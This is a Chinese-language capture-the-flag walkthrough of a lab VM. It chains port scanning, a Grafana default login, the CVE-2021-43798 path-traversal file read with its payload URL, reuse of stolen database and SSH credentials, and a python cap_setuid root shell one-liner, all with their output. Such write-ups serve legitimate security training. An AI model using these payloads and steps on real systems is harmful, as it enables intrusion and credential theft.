信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.162  08:00:27:9b:88:04       (Unknown)
192.168.60.254  00:50:56:e0:e6:12       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.986 seconds (128.90 hosts/sec). 4 responded
❯ export ip=192.168.60.162
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.162:22
Open 192.168.60.162:80
Open 192.168.60.162:3000
Open 192.168.60.162:3306
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-17 21:11 CST
Initiating ARP Ping Scan at 21:11
Scanning 192.168.60.162 [1 port]
Completed ARP Ping Scan at 21:11, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:11
Completed Parallel DNS resolution of 1 host. at 21:11, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:11
Scanning 192.168.60.162 [4 ports]
Discovered open port 3000/tcp on 192.168.60.162
Discovered open port 80/tcp on 192.168.60.162
Discovered open port 22/tcp on 192.168.60.162
Discovered open port 3306/tcp on 192.168.60.162
Completed SYN Stealth Scan at 21:11, 0.03s elapsed (4 total ports)
Nmap scan report for 192.168.60.162
Host is up, received arp-response (0.00078s latency).
Scanned at 2025-01-17 21:11:12 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
3000/tcp open  ppp     syn-ack ttl 64
3306/tcp open  mysql   syn-ack ttl 64
MAC Address: 08:00:27:9B:88:04 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

80端口提示未授权禁止访问

换到3000端口发现是个Grafana，版本为8.2.0

可以使用弱密码登入admin:admin，开始会让你修改密码，改为原密码就行了

文件读取漏洞

通过搜寻发现该版本下存在文件读取漏洞

Grafana 8.3.1, 8.2.7, 8.1.8, and 8.0.7 released with high severity security fix | Grafana Labs

pedrohavay/exploit-grafana-CVE-2021-43798: This is a proof-of-concept exploit for Grafana’s Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).

编辑一下targets.txt

❯ python3 exploit.py
  _____   _____   ___ __ ___ _     _ _ ________ ___ ___
 / __\ \ / / __|_|_  )  \_  ) |___| | |__ /__  / _ ( _ )
| (__ \ V /| _|___/ / () / /| |___|_  _|_ \ / /\_, / _ \
 \___| \_/ |___| /___\__/___|_|     |_|___//_/  /_/\___/
                @pedrohavay / @acassio22

? Enter the target list:  targets.txt

========================================

[i] Target: http://192.168.60.162:3000

[!] Payload "http://192.168.60.162:3000/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" works.

[i] Analysing files...

[i] File "/conf/defaults.ini" found in server.
[*] File saved in "./http_192_168_60_162_3000/defaults.ini".

[i] File "/etc/grafana/grafana.ini" found in server.
[*] File saved in "./http_192_168_60_162_3000/grafana.ini".

[i] File "/etc/passwd" found in server.
[*] File saved in "./http_192_168_60_162_3000/passwd".

[i] File "/var/lib/grafana/grafana.db" found in server.
[*] File saved in "./http_192_168_60_162_3000/grafana.db".

[i] File "/proc/self/cmdline" found in server.
[*] File saved in "./http_192_168_60_162_3000/cmdline".

? Do you want to try to extract the passwords from the data source?  Yes

[i] Secret Key: SW2YcwTIb9zpOOhoPsMm

[*] Bye Bye!

发现用户cloud，在配置文件中还发现了数据库连接凭证

❯ cat passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
cloud:x:1001:1001:,,,:/home/cloud:/bin/bash
❯ cat grafana.ini|grep -A 4 mysql
# Either "mysql", "postgres" or "sqlite3", it's your choice
type = mysql
host = 127.0.0.1:3306
name = grafana_db
user = grafana
password = mxIn1{JnyiKP{48SqvzEpa6S2
--
# Example: mysql://user:secret@host:port/database
;url =

# For "postgres" only, either "disable", "require" or "verify-full"
;ssl_mode = disable
--
# Currently, only "mysql" driver supports isolation levels.
# If the value is empty - driver's default isolation level is applied.
# For "mysql" use "READ-UNCOMMITTED", "READ-COMMITTED", "REPEATABLE-READ" or "SERIALIZABLE".
;isolation_level =

;ca_cert_path =
;client_key_path =

3306端口开放，尝试连接一下，跳过ssl证书验证

❯ mysql -h 192.168.60.162 -u grafana -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 19
Server version: 8.0.39-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| grafana_db         |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.083 sec)

MySQL [(none)]> use grafana_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [grafana_db]> show tables;
+----------------------------+
| Tables_in_grafana_db       |
+----------------------------+
| alert                      |
| alert_configuration        |
| alert_instance             |
| alert_notification         |
| alert_notification_state   |
| alert_rule                 |
| alert_rule_tag             |
| alert_rule_version         |
| annotation                 |
| annotation_tag             |
| api_key                    |
| cache_data                 |
| dashboard                  |
| dashboard_acl              |
| dashboard_provisioning     |
| dashboard_snapshot         |
| dashboard_tag              |
| dashboard_version          |
| data_source                |
| kv_store                   |
| library_element            |
| library_element_connection |
| login_attempt              |
| migration_log              |
| ngalert_configuration      |
| org                        |
| org_user                   |
| playlist                   |
| playlist_item              |
| plugin_setting             |
| preferences                |
| quota                      |
| server_lock                |
| session                    |
| short_url                  |
| star                       |
| tag                        |
| team                       |
| team_member                |
| temp_user                  |
| test_data                  |
| user                       |
| user_auth                  |
| user_auth_token            |
| users                      |
+----------------------------+
45 rows in set (0.004 sec)

MySQL [grafana_db]> select * from users;
+---------+--------------------------------+
| usuario | passwd                         |
+---------+--------------------------------+
| cloud   | b0KjQXwH801dm2vnOgP2anEc8JGidc |
+---------+--------------------------------+
1 row in set (0.004 sec)

用户提权

拿到用户的密码，ssh连接一下

❯ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of vie 17 ene 2025 14:24:11 UTC

  System load:  0.1               Processes:               114
  Usage of /:   60.5% of 9.75GB   Users logged in:         0
  Memory usage: 30%               IPv4 address for enp0s3: 192.168.60.162
  Swap usage:   0%


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Oct 18 17:35:25 2024 from 192.168.18.48
cloud@TheHackersLabs-Incertidumbre:~$ ls
time.sh  user.txt
cloud@TheHackersLabs-Incertidumbre:~$ cat user.txt
a1Tz9bD4uJ6X2pN5vR8cLq7sW3YfG0hK9VmZxP3

Root提权

家目录有个脚本文件

#!/bin/bash

# 请求用户输入日期和时间
echo "请输入日期（DD）："
read day
echo "请输入月份（MM）："
read month
echo "请输入年份（YYYY）："
read year
echo "请输入小时（HH - 24小时制）："
read hour
echo "请输入分钟（MM）："
read minutes

# 验证输入是否符合正确格式
if ! [[ "$day" =~ ^[0-9]{2}$ ]] || ! [[ "$month" =~ ^[0-9]{2}$ ]] || ! [[ "$year" =~ ^[0-9]{4}$ ]]; then
    echo "错误：输入的日期格式不正确。请确保使用正确的格式。"
    exit 1
fi

if ! [[ "$hour" =~ ^[0-9]{2}$ ]] || ! [[ "$minutes" =~ ^[0-9]{2}$ ]]; then
    echo "错误：输入的小时或分钟格式不正确。"
    exit 1
fi

# 验证时间是否在合理范围内
if [ "$hour" -lt 0 ] || [ "$hour" -gt 23 ] || [ "$minutes" -lt 0 ] || [ "$minutes" -gt 59 ]; then
    echo "错误：输入的时间不在有效范围内。"
    exit 1
fi

# 构造新的日期和时间
new_date="$year-$month-$day $hour:$minutes:00"
echo "新的日期和时间是：$new_date"

# 确认是否继续更改系统时间
echo "是否继续并更改系统时间？(是/否)："
read confirm

if [ "$confirm" == "是" ]; then
    # 尝试更改系统时间
    sudo /usr/local/bin/set_date.sh "$new_date"
    if [ $? -eq 0 ]; then
        echo "系统时间已更新为：$(date)"
    else
        echo "错误：无法更新系统时间。"
        exit 1
    fi
else
    echo "操作已取消。"
fi

用户拥有sudo权限

cloud@TheHackersLabs-Incertidumbre:~$ sudo -l
sudo: unable to resolve host TheHackersLabs-Incertidumbre: Temporary failure in name resolution
Matching Defaults entries for cloud on TheHackersLabs-Incertidumbre:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cloud may run the following commands on TheHackersLabs-Incertidumbre:
    (ALL) NOPASSWD: /usr/local/bin/set_date.sh
cloud@TheHackersLabs-Incertidumbre:~$ ls -al /usr/local/bin/set_date.sh
-rwx------ 1 root root 87 oct 16 14:52 /usr/local/bin/set_date.sh

不过这些都是陷阱，是无法进行提权的

我们可以发现用户有python的cap_setsuid的权限

cloud@TheHackersLabs-Incertidumbre:~$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/snap/core20/1828/usr/bin/ping = cap_net_raw+ep
cloud@TheHackersLabs-Incertidumbre:~$ python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
root@TheHackersLabs-Incertidumbre:~# id
uid=0(root) gid=1001(cloud) groups=1001(cloud)
root@TheHackersLabs-Incertidumbre:~# cat /root/root.txt
G5nZ2qL1vW9jP4sR3kF7tM8xB0dH6yV3uX9mK7r